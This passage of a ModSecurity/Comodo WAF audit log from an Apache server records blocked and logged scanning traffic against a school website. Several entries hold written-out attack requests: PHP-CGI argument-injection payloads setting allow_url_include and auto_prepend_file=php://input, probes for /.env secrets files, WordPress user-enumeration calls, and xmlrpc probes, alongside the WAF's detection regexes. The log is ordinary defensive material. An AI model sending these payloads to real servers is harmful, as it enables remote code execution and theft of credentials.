REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453837455788 3255 (- - -) Stopwatch2: 1747453837455788 3255; combined=1429, p1=502, p2=895, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fed524b-Z-- --6c04b42e-A-- [17/May/2025:10:50:50 +0700] aCgHmhKi5m5upc8uMd6jnQAAANU 103.236.140.4 51200 103.236.140.4 8181 --6c04b42e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6c04b42e-C-- demo.sayHello --6c04b42e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c04b42e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453850487144 5656 (- - -) Stopwatch2: 1747453850487144 5656; combined=4116, p1=548, p2=3348, p3=31, p4=34, p5=92, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c04b42e-Z-- --8bffbb58-A-- [17/May/2025:11:02:35 +0700] aCgKWwTOsBn9MSWb6WJwLQAAAI0 103.236.140.4 51260 103.236.140.4 8181 --8bffbb58-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 156.255.1.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 156.255.1.144 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8bffbb58-C-- --8bffbb58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8bffbb58-E-- --8bffbb58-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747454555189559 4763 (- - -) Stopwatch2: 1747454555189559 4763; combined=3003, p1=507, p2=2461, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bffbb58-Z-- --209c774a-A-- [17/May/2025:11:36:31 +0700] aCgSTwTOsBn9MSWb6WJwZwAAAJU 103.236.140.4 51492 103.236.140.4 8181 --209c774a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --209c774a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --209c774a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747456591414140 3533 (- - -) Stopwatch2: 1747456591414140 3533; combined=1468, p1=483, p2=947, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --209c774a-Z-- --ba80da1f-A-- [17/May/2025:11:36:39 +0700] aCgSVwTOsBn9MSWb6WJwaQAAAJg 103.236.140.4 51496 103.236.140.4 8181 --ba80da1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ba80da1f-C-- demo.sayHello --ba80da1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba80da1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747456599658446 6566 (- - -) Stopwatch2: 1747456599658446 6566; combined=4612, p1=608, p2=3812, p3=32, p4=35, p5=74, sr=80, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba80da1f-Z-- --d13f1874-A-- [17/May/2025:11:41:02 +0700] aCgTXhKi5m5upc8uMd6jrAAAAMA 103.236.140.4 51558 103.236.140.4 8181 --d13f1874-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d13f1874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d13f1874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747456862517705 805 (- - -) Stopwatch2: 1747456862517705 805; combined=327, p1=274, p2=0, p3=0, p4=0, p5=53, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d13f1874-Z-- --202f335c-A-- [17/May/2025:11:54:14 +0700] aCgWdnyxdQCiyU1ENFcr3AAAAAA 103.236.140.4 51668 103.236.140.4 8181 --202f335c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.120 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --202f335c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --202f335c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747457654008727 2813 (- - -) Stopwatch2: 1747457654008727 2813; combined=1237, p1=441, p2=767, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --202f335c-Z-- --6e894012-A-- [17/May/2025:11:54:20 +0700] aCgWfATOsBn9MSWb6WJwhAAAAJg 103.236.140.4 51672 103.236.140.4 8181 --6e894012-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.120 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.120 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6e894012-C-- demo.sayHello --6e894012-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e894012-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747457660762946 6681 (- - -) Stopwatch2: 1747457660762946 6681; combined=4761, p1=598, p2=3883, p3=38, p4=43, p5=129, sr=98, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e894012-Z-- --9025d076-A-- [17/May/2025:12:05:23 +0700] aCgZE-m4kjNN-hEbWjJDmAAAAEE 103.236.140.4 51742 103.236.140.4 8181 --9025d076-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9025d076-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9025d076-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747458323059406 3290 (- - -) Stopwatch2: 1747458323059406 3290; combined=1390, p1=478, p2=881, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9025d076-Z-- --76519011-A-- [17/May/2025:12:05:28 +0700] aCgZGOm4kjNN-hEbWjJDmgAAAEQ 103.236.140.4 51746 103.236.140.4 8181 --76519011-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.91 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76519011-C-- demo.sayHello --76519011-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76519011-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747458328311790 4706 (- - -) Stopwatch2: 1747458328311790 4706; combined=3644, p1=461, p2=2982, p3=23, p4=26, p5=90, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76519011-Z-- --7d422167-A-- [17/May/2025:12:16:07 +0700] aCgbl-m4kjNN-hEbWjJDqwAAAFA 103.236.140.4 51800 103.236.140.4 8181 --7d422167-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7d422167-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d422167-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747458967841718 2930 (- - -) Stopwatch2: 1747458967841718 2930; combined=1266, p1=454, p2=780, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d422167-Z-- --f2955740-A-- [17/May/2025:12:16:13 +0700] aCgbnem4kjNN-hEbWjJDrQAAAFI 103.236.140.4 51804 103.236.140.4 8181 --f2955740-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.0 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.0 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f2955740-C-- demo.sayHello --f2955740-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2955740-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747458973483763 5402 (- - -) Stopwatch2: 1747458973483763 5402; combined=4025, p1=546, p2=3261, p3=29, p4=34, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2955740-Z-- --f79b6e37-A-- [17/May/2025:12:22:10 +0700] aCgdAnyxdQCiyU1ENFcr5QAAABA 103.236.140.4 51908 103.236.140.4 8181 --f79b6e37-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.136 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.136 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --f79b6e37-C-- --f79b6e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f79b6e37-E-- --f79b6e37-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747459330435512 3931 (- - -) Stopwatch2: 1747459330435512 3931; combined=2162, p1=529, p2=1599, p3=0, p4=0, p5=34, sr=92, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f79b6e37-Z-- --a6d5cd4a-A-- [17/May/2025:12:28:40 +0700] aCgeiOm4kjNN-hEbWjJD3wAAAEY 103.236.140.4 51954 103.236.140.4 8181 --a6d5cd4a-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.154.143.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.154.143.162 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a6d5cd4a-C-- --a6d5cd4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6d5cd4a-E-- --a6d5cd4a-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747459720437017 5067 (- - -) Stopwatch2: 1747459720437017 5067; combined=3234, p1=545, p2=2650, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6d5cd4a-Z-- --9e49ed3d-A-- [17/May/2025:13:01:47 +0700] aCgmS3yxdQCiyU1ENFctiAAAAAM 103.236.140.4 55220 103.236.140.4 8181 --9e49ed3d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 134.199.149.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 134.199.149.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9e49ed3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e49ed3d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747461707274475 676 (- - -) Stopwatch2: 1747461707274475 676; combined=289, p1=252, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e49ed3d-Z-- --5243dc2e-A-- [17/May/2025:13:51:12 +0700] aCgx4Om4kjNN-hEbWjJGWQAAAEk 103.236.140.4 58150 103.236.140.4 8181 --5243dc2e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.77.21.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.77.21.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5243dc2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5243dc2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747464672757875 3274 (- - -) Stopwatch2: 1747464672757875 3274; combined=1446, p1=509, p2=905, p3=0, p4=0, p5=32, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5243dc2e-Z-- --c0aba234-A-- [17/May/2025:14:15:01 +0700] aCg3dRKi5m5upc8uMd6mygAAAME 103.236.140.4 58406 103.236.140.4 8181 --c0aba234-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --c0aba234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0aba234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747466101924862 879 (- - -) Stopwatch2: 1747466101924862 879; combined=381, p1=336, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
